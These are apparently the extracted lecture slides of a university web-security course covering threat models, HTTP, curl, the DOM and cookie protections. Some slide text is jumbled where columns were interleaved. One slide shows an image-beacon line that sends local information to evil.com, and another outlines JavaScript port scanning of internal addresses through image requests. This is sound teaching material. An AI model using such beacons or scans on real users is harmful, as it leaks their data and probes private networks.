CSE484/CSE584 BASIC WEB SECURITY MODEL Dr. Benjamin Livshits Web Security Web Attacker Sets up malicious site visited by victim; no control of network Alice Network Security Network Attacker Intercepts and controls network communication Alice Web Malware Attacker Malware Attacker Escapes the browser to wreak havoc on Alice’s machine Alice Web Threat Models Web attacker Control https://attacker.com Can obtain SSL/TLS certificate for https://attacker.com User visits attacker.comThis is what connects the world Or: runs attacker’s Facebook app, etc. of web attacks to low-level Network attacker memory-based exploitation Passive: Wireless eavesdropper we’ve seen so far Active: Evil router, DNS poisoning Malware attacker Attacker escapes browser isolation mechanisms and run separately under control of OS Goals of Web Security Safely browse the web Support secure web applications Users should be able to Applications delivered over We willthe see web a lot should have the visit a variety of web of Java sameand PHP security properties sites, without incurring and JavaScript,we require for stand-alone applications harm: but not C or C++ No stolen information such as login credentials or Maybe even better properties because most cookies web applications enjoy the Site A cannot compromise protection provided by session at Site B memory-safe languages Looking Ahead HTTP Communication Rendering content Navigation Cookies Security User Interface Isolation Frames and frame busting HTTP URLs or URIs Global identifiers of network-retrievable documents Example: https://courses.cs.washington.edu:80/courses/cse484/14au/#schedule Protocol Fragment Hostname Port Path Special characters are encoded as hex: %0A = newline %20 or + = space, %2B = + (special exception) Short and Long URLs 10 Bit.ly: http://bit.ly/1vEIGks http://longurlmaker.com: http://www.longurlmaker.com/go?id=7continuedg20fIs.gd0GetShortyagl56001drawn%2Boutu6lingeringShortlinksX .sestretchedd7lingeringzc8faraway0UrlTeajbstretched15jcontinued011expanded86v3stretchedqdXil40ShortenURLk Xilz401spun%2Boutq54bextensiveShrtndwoutstretched151TinyLinkcontinued2lastingdltallaU76nr0h61g5aIs.gdd01 41cMooURL085ShortURLcShortenURL40stretchrangyXil3p17hSitelutionsuwURLvi1enlargedc03743186701Dwarfurl 4aefwextensive0EasyURL315continuedbprotractedb19GetShorty2SHurl171enduring038r8bURLviremote6URL1Shor tURLspun%2Boutelongated0aX.seoutstretched0d4distantSimURL27highd418olasting9ShoterLink8stretchedoSHurl4 lankydrawn%2Bout0drawn%2Boutlofty19a2kenduringShortenURLxs0spread%2Bout9distantFly2d10101great0w78 NutshellURL190Minilienstretchedn0stretchd0ShortenURL0enlargedtallX.seelongated9URL.co.ukspun%2BoutURLvi8 e1012Shim00Ulimit7lasting3Shim034far%2Boff47spun%2Bout17nwelongated17a99eeexpandedtallm9MooURL1dr emote46URL11NutshellURLStartURLb5itall40c6Shrinkr0Fly2lasting91n8clengthened51X.se5Minilien2ShredURLBea m.to99continued131G8L1ffarawaycontinued0distantrangy7c04964300315a2RubyURLfU76154j1roh82lengthened0 faraway1z4outstretched1lr1B654301URL09stringyq8ShrinkURL184h7Dwarfurldrunningloftylingering18spread%2Bo ut68101ShortURL10kalengthy9B653ab41fextensive0prolonged7p11expandedprolongedremotec2Minilien0dB65str etchingarfaraway3extensive1yclnk.in9lankygreat50TightURL173cURL.co.ukmba2049815920prolonged8fprotractedf 0stringy6i164eelongatedMiniliene9elongated0PiURL1488gd2020a30far%2Breachinglengthy216d411t691elongate1 6extensived0drawn%2Bout11lankyYepItB65Shim31extensiveURLCutterShim99GetShorty1042Fly2af0e8protractede longatey0111563FhURL9c3TinyURLn8toweringDwarfurl10d6350c5TightURL3lnk.in03Shrtnd6g0lingering18gangling prolonged8astringy7StartURL100TraceURLSmallr01drawn%2Bout60ganglingstringy80Beam.tocdistantsG8LX.sedra wn%2Boutedrawn%2Bouty040SitelutionsU7601drawn%2Bout6f53A2N2lasting1194stretchinggangling20lnk.inURLC utter135b80b3ShortURL6far%2Boffm013q515deep8WapURLShrinkURLd410090lnk.infar%2Boff701far%2Boff96ling ering8a6x38118Redirxfar%2Breaching1stretched0protracted16t0l21130b90106zShoterLink967Smallr9R HTTP Request Method File HTTP version Headers GET /index.html HTTP/1.1 Accept: image/gif, image/x-bitmap, image/jpeg, */* Accept-Language: en Connection: Keep-Alive User-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Windows 95) Host: www.example.com Referer: http://www.google.com?q=dingbats Blank line Data – none for GET GET : no side effect POST : possible side effect POST 12 POST /pass.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://127.0.0.1/pass.php Cookie: passx=87e8af376bc9d9bfec2c7c0193e6af70; PHPSESSID=l9hk7mfh0ppqecg8gialak6gt5 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 30 username=zurfyx&pass=password Automation with CURL 13 curl --data "birthyear=1905&press=%20OK%20" http://www.example.com/when.cgi curl --data-urlencode "name=I am Daniel" http://www.example.com Submit/POST binary data to a URL curl -X POST --data-binary @myfile.bin http://foo.com HTTP Response HTTP version Status code Reason phrase Headers HTTP/1.0 200 OK Date: Sun, 21 Apr 1996 02:20:42 GMT Server: Microsoft-Internet-Information-Server/5.0 Connection: keep-alive Content-Type: text/html Data Last-Modified: Thu, 18 Apr 1996 17:39:05 GMT Set-Cookie: … Content-Length: 2543 <HTML> Some data... blah, blah, blah </HTML> Cookies Common HTTP Codes 15 200 OK 401 Unauthorized 300 Multiple Choices 403 Forbidden 301 Moved Permanently 404 Not Found 302 Found 410 Gone 304 Not Modified 500 Internal Server Error 307 Temporary Redirect 501 Not Implemented 400 Bad Request 503 Service Unavailable 550 Permission denied Browser Tools 16 Watch the HTTP Traffic 17 HTTP Supports Caching 18 And Responses Can Be Interesting 19 And Surprising… 20 Interacting with Google using CURL 21 1. Authenticate with Google first curl https://www.google.com/accounts/ClientLogin --data- urlencode [email protected] --data-urlencode Passwd=yourpasswd -d accountType=GOOGLE -d source=your.org-your.service- your.service.version -d service=wise SID=DQAAANcAAABjXXX; LSID=DQAAANoAXXX; Auth=DQAAANkAXXX 2. Get your spreadsheets curl --silent --header "Authorization: GoogleLogin auth=DQAAANkAXXX" "https://spreadsheets.google.com/feeds/spreadsheets/private/full " | tidy -xml -indent -quiet 3. Get a particular spreadsheet curl --silent --header "Authorization: GoogleLogin auth=$AUTH" "https://spreadsheets.google.com/feeds/download/spreadsheets/Exp ort?key=$KEY&exportFormat=tsv" | sort -n -k 15 -t $'\t' Rendering Content Rendering and Events Each browser window Events can be or frame… User actions: Loads content OnClick Renders it OnMouseover Processes HTML and Rendering: scripts to display page OnLoad May involve images, OnBeforeUnload sub-frames, etc. Timing: Responds to events setTimeout() clearTimeout() Connecting it All Together 24 Slightly More Complex… 25 Document Object Model (DOM) Object-oriented interface used to read and write docs Web page in HTML is structured data DOM provides representation of this hierarchy Includes Browser Object Model (BOM) window document frames[] history location navigator (type and version of browser) Deep DOM Trees 27 Pre-Year 2000 28 frame Pre-Year 2000: Functionality Added Via JavaScript 29 frame Changing HTML using JavaScript, DOM Some possibilities createElement(elementName) HTML createTextNode(text) <ul id="t1"> <li> Item 1 </li> appendChild(newChild) </ul> removeChild(node) Example: Add a new list item: var list = document.getElementById('t1') var newitem = document.createElement('li') var newtext = document.createTextNode(text) list.appendChild(newitem) newitem.appendChild(newtext) HTML Image Tags 31 <html> … <p> … </p> … <img src=“http://example.com/ sunset.gif” height="50" width="100"> … </html> Any security issues? Image Beacons 32 Communicate with other sites <img src=“http://evil.com/pass- local- information.jpg?extra_info rmation”> Hide resulting image <img src=“ … ” height=“1" width=“1"> Spoof other sites: add logos that fool a user Beacons in Practice 33 onError in JavaScript 34 Triggered in case of error Can register a JavaScript handler <img src="image.gif" onerror= "alert( 'The image couldn’t be loaded.')“ > Port Scanning Behind A Firewall JavaScript can: Request images from internal IP addresses Example: <img src=“192.168.0.4:8080”/> Use timeout/onError to determine success/failure Fingerprint webapps using known image names Server 1) “show me dancing pigs!” scan Malicious 2) “check this out” Web page scan 3) port scan results Browser scan Firewall 36 Break… Cookies: Client State 37 Cookies: Browser State POST … Browser Server HTTP Header: Set-cookie: NAME=VALUE ; domain = (who can read) ; If expires=NULL: expires = (when expires) ; this session only secure = (only over SSL) Browser POST … Server Cookie: NAME = VALUE HTTP is stateless protocol; cookies add state Cookie-Based Authentication Browser Web Server Auth server POST login.cgi Username & pwd Validate user Set-cookie: auth=val auth=val Store val GET restricted.html Cookie: auth=val restricted.html auth=val Check val If YES, YES/NO restricted.html Cookie Security Policy Uses: User authentication Personalization User tracking: e.g. Doubleclick (3rd party cookies) Browser will store: At most 20 cookies/site, 3 KB / cookie Origin is the tuple <domain, path> Can set cookies valid across a domain suffix Cookies From www.marketplace.org 41 Secure Cookies GET … Browser Server HTTP Header: Set-cookie: NAME=VALUE ; Secure=true Provides confidentiality against network attacker Browser will only send cookie back over HTTPS No integrity Can rewrite secure cookies over HTTP Network attacker can rewrite secure cookie Can log user into attacker’s account A Real Secure Set-Cookie Request 43 httpOnly Cookies GET … Browser Server HTTP Header: Set-cookie: NAME=VALUE ; httpOnly Cookie sent over HTTP(s), but not accessible to scripts cannot be read via document.cookie Helps prevent cookie theft via XSS … but does not stop most other risks of XSS bugs .